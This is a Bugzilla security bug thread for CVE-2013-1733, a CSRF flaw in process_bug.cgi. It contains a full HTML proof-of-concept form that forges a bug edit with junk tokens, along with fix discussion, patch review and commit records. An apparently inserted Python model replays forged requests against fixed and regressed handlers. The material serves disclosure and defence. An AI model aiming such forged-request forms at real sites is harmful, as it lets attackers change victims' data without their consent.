Closed Bug 911593 (CVE-2013-1733) Opened 11 years ago Closed 11 years ago

[SECURITY] CSRF in process_bug.cgi

Categories

(Bugzilla :: Creating/Changing Bugs, defect)

defect
Not set
major

Tracking

RESOLVED FIXED
Bugzilla 4.4

People

(Reporter: mateusz.goik, Assigned: LpSolit)

Details

(4 keywords)

Attachments

(1 file)

PoC: (Changes in the bug with ID 21951 - landfill.bugzilla.org)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/process_bug.cgi" method="POST">
      <input type="hidden" name="delta&#95;ts" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="longdesclength" value="1" />
      <input type="hidden" name="id" value="21951" />
      <input type="hidden" name="token" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="alias" value="aaaaaaaaa" />
      <input type="hidden" name="short&#95;desc" value="TEST2" />
      <input type="hidden" name="product" value="FoodReplicator" />
      <input type="hidden" name="classification" value="Unclassified" />
      <input type="hidden" name="component" value="renamed&#32;component" />
      <input type="hidden" name="rep&#95;platform" value="PC" />
      <input type="hidden" name="op&#95;sys" value="Linux" />
      <input type="hidden" name="priority" value="P2" />
      <input type="hidden" name="bug&#95;severity" value="normal" />
      <input type="hidden" name="target&#95;milestone" value="&#45;&#45;&#45;" />
      <input type="hidden" name="assigned&#95;to" value="mybutt&#64;inyourface&#46;com" />
      <input type="hidden" name="qa&#95;contact" value="" />
      <input type="hidden" name="bug&#95;file&#95;loc" value="" />
      <input type="hidden" name="status&#95;whiteboard" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="tag" value="" />
      <input type="hidden" name="dependson" value="" />
      <input type="hidden" name="blocked" value="" />
      <input type="hidden" name="newcc" value="" />
      <input type="hidden" name="defined&#95;bug&#95;ignored" value="1" />
      <input type="hidden" name="see&#95;also" value="" />
      <input type="hidden" name="cf&#95;large&#95;text" value="" />
      <input type="hidden" name="cf&#95;free&#95;text" value="" />
      <input type="hidden" name="defined&#95;cf&#95;mulitple&#95;select" value="" />
      <input type="hidden" name="cf&#95;drop&#95;down" value="&#45;&#45;&#45;" />
      <input type="hidden" name="cf&#95;date" value="" />
      <input type="hidden" name="cf&#95;bug&#95;id" value="" />
      <input type="hidden" name="flag&#95;type&#45;8" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;8" value="" />
      <input type="hidden" name="flag&#95;type&#45;9" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;9" value="" />
      <input type="hidden" name="flag&#95;type&#45;11" value="X" />
      <input type="hidden" name="flag&#95;type&#45;5" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;5" value="" />
      <input type="hidden" name="flag&#95;type&#45;10" value="X" />
      <input type="hidden" name="flag&#95;type&#45;6" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;6" value="" />
      <input type="hidden" name="flag&#95;type&#45;12" value="X" />
      <input type="hidden" name="estimated&#95;time" value="0&#46;0" />
      <input type="hidden" name="work&#95;time" value="0" />
      <input type="hidden" name="remaining&#95;time" value="0&#46;0" />
      <input type="hidden" name="deadline" value="" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="bug&#95;status" value="CONFIRMED" />
      <input type="hidden" name="resolution" value="FIXED" />
      <input type="hidden" name="dup&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Confirmed! This is a regression due to bug 69447 which generates a new valid token without first making sure that the midair collision page will be displayed. This bug only affects 4.4 and newer. 4.3.3 and older are not affected.
Assignee: general → create-and-change
Severity: normal → major
Component: Bugzilla-General → Creating/Changing Bugs
Depends on: 69447
Flags: blocking4.4.1+
Keywords: regression
OS: Linux → All
Hardware: x86_64 → All
Summary: CSRF - bugzilla → CSRF in process_bug.cgi
Target Milestone: --- → Bugzilla 4.4
Version: unspecified → 4.4
I'm on it. Easy to fix.
Assignee: create-and-change → LpSolit
Status: NEW → ASSIGNED
Attached patch: patch, v1 (Splinter Review)
The new token must only be generated when we are going to display the midair collision page. Also, I had to validate delta_ts, else it was possible to crash PostgreSQL if you passed an invalid one.
Attachment #798337 - Flags: review?(dkl)
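To make the ordering point in this comment concrete, here is an added Python model of the token flow around a bug-edit endpoint (example code written for this page, not Bugzilla's process_bug.cgi). It places the corrected handler, which validates delta_ts strictly, verifies the submitted token, and mints a fresh token only when the midair-collision page is actually shown, beside a handler that models the regression by minting the token before that decision. The HMAC token format, the timestamp format, the in-memory bug record and all function names are assumptions made for the example.

```python
import hashlib
import hmac
from datetime import datetime

TS_FORMAT = "%Y-%m-%d %H:%M:%S"
SECRET = b"constructed-site-secret"  # placeholder; a deployment uses a random per-site secret

# Constructed in-memory "database": one bug, keyed by id (values are made up).
BUGS = {21951: {"short_desc": "original summary", "delta_ts": "2013-08-31 10:00:00"}}


def issue_token(bug_id, delta_ts):
    """Edit-form token bound to the bug id and the delta_ts the form was rendered with
    (assumed format: HMAC-SHA256 over "id|delta_ts")."""
    msg = f"{bug_id}|{delta_ts}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def check_token(token, bug_id, delta_ts):
    """Constant-time comparison against the token the server would have issued."""
    expected = issue_token(bug_id, delta_ts)
    return hmac.compare_digest((token or "").encode(), expected.encode())


def parse_delta_ts(value):
    """Strict parse: garbage raises ValueError here instead of reaching the database."""
    return datetime.strptime(value, TS_FORMAT)


def apply_edit(bug, form):
    bug["short_desc"] = form["short_desc"]
    bug["delta_ts"] = datetime.now().strftime(TS_FORMAT)
    return {"result": "updated", "short_desc": bug["short_desc"]}


def handle_edit_fixed(form):
    """Corrected ordering: validate input, verify the token the client sent, and only
    generate a new token when the midair-collision page is actually displayed."""
    bug_id = int(form["id"])
    bug = BUGS[bug_id]
    submitted_ts = form.get("delta_ts")
    if submitted_ts:
        try:
            parse_delta_ts(submitted_ts)
        except ValueError:
            return {"result": "error", "reason": "invalid_timestamp"}
    if not check_token(form.get("token"), bug_id, submitted_ts):
        return {"result": "error", "reason": "invalid_token"}
    if submitted_ts and submitted_ts != bug["delta_ts"]:
        # Someone changed the bug since the form was loaded: show the midair page.
        # This is the only place a fresh token is minted.
        return {"result": "midair", "token": issue_token(bug_id, bug["delta_ts"]),
                "delta_ts": bug["delta_ts"]}
    return apply_edit(bug, form)


def handle_edit_regressed(form):
    """Model of the regression: the midair page's token is minted and written into the
    request before deciding whether that page will be shown, so the later check sees a
    server-issued token whenever the submitted delta_ts matches the current one."""
    bug_id = int(form["id"])
    bug = BUGS[bug_id]
    submitted_ts = form.get("delta_ts")
    if submitted_ts:
        form = dict(form, token=issue_token(bug_id, bug["delta_ts"]))  # overwrites client token
        if submitted_ts != bug["delta_ts"]:
            return {"result": "midair", "token": form["token"], "delta_ts": bug["delta_ts"]}
    if not check_token(form.get("token"), bug_id, submitted_ts):
        return {"result": "error", "reason": "invalid_token"}
    return apply_edit(bug, form)


def demo():
    """Replays constructed requests against both handlers and returns each outcome."""
    bug_id, out = 21951, {}
    cur = BUGS[bug_id]["delta_ts"]
    forged = {"id": str(bug_id), "delta_ts": cur, "token": "a" * 21, "short_desc": "TEST2"}
    garbage = dict(forged, delta_ts="a" * 21)
    legit = {"id": str(bug_id), "delta_ts": cur, "token": issue_token(bug_id, cur),
             "short_desc": "legit edit"}
    out["fixed_forged"] = handle_edit_fixed(forged)["reason"]      # junk token rejected
    out["fixed_garbage"] = handle_edit_fixed(garbage)["reason"]    # junk delta_ts rejected
    out["fixed_legit"] = handle_edit_fixed(legit)["result"]        # real form applied
    midair = handle_edit_fixed(dict(legit, short_desc="second edit"))
    out["fixed_stale"] = midair["result"]                          # stale form: midair page
    resubmit = dict(legit, short_desc="second edit", delta_ts=midair["delta_ts"],
                    token=midair["token"])
    out["fixed_resubmit"] = handle_edit_fixed(resubmit)["result"]  # midair token works
    # Regressed ordering: the same junk-token request with the bug's current delta_ts
    # (visible on the bug page) is applied, which is the CSRF this report is about.
    out["regressed_forged"] = handle_edit_regressed(
        dict(forged, delta_ts=BUGS[bug_id]["delta_ts"]))["result"]
    return out


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The detection value for a defender is the asymmetry in `demo()`: with the corrected ordering, a request carrying a token the server did not issue never reaches `apply_edit`, whatever delta_ts it carries, and an unparsable delta_ts is refused before any query is built.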
Summary: CSRF in process_bug.cgi → [SECURITY] CSRF in process_bug.cgi
Flags: sec-bounty?
Blocks: 912643
Assigning CVE-2013-1733 to this vulnerability.
Alias: CVE-2013-1733
Blocks: 912661
Comment on attachment 798337 [details] [diff] [review] patch, v1 Review of attachment 798337 [details] [diff] [review]: ----------------------------------------------------------------- Looks fine and fixes the issue for me. r=dkl ::: process_bug.cgi @@ +114,5 @@ > +my $delta_ts = $cgi->param('delta_ts'); > + > +if ($delta_ts) { > + my $delta_ts_z = datetime_from($delta_ts) > + or ThrowCodeError('invalid_timestamp', { timestamp => $delta_ts }); nit: 4 space indentation @@ +124,3 @@ > > + my $start_at = $cgi->param('longdesclength') > + or ThrowCodeError('undefined_field', { field => 'longdesclength' }); same nit
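Review bot: In the first hunk, `if ($delta_ts)` skips the whole block whenever delta_ts is missing, empty or "0", so `datetime_from` and the `invalid_timestamp` error are only reached for a non-empty value; confirm that the midair comparison further down treats an absent delta_ts as "no collision check" rather than as a match, since only the validation is visible here. Also consider whether a malformed client-supplied timestamp is better reported with a user error than with `ThrowCodeError`, which is normally reserved for conditions the code itself should never produce.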
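Review bot: In the second hunk, `$cgi->param('longdesclength') or ThrowCodeError(...)` also rejects a submitted value of 0, because Perl treats "0" as false; if 0 can never be a legitimate comment count that is harmless, otherwise test with `defined` and validate the value as a non-negative integer explicitly, since it is client-controlled.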
Attachment #798337 - Flags: review?(dkl) → review+
(In reply to David Lawrence [:dkl] from comment #5)
> nit: 4 space indentation

Not when splitting long lines. ;)
Flags: approval?
Flags: approval4.4?
Will be patched on bugzilla.redhat.com at 4am UTC (just over two hours from now)
Flags: approval?
Flags: approval4.4?
Flags: approval4.4+
Flags: approval+
Dave: does this affect BMO? iirc we're on 4.2 plus backported goodies and may or may not suffer from this.
Flags: needinfo?(dkl)
(In reply to Daniel Veditz [:dveditz] from comment #8)
> Dave: does this affect BMO?

Yes, see bug 912661.
Flags: needinfo?(dkl)
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified process_bug.cgi
Committed revision 8777.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified process_bug.cgi
Committed revision 8623.
Status: ASSIGNED → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Group: bugzilla-security
Security advisory sent.
Flags: sec-bounty? → sec-bounty+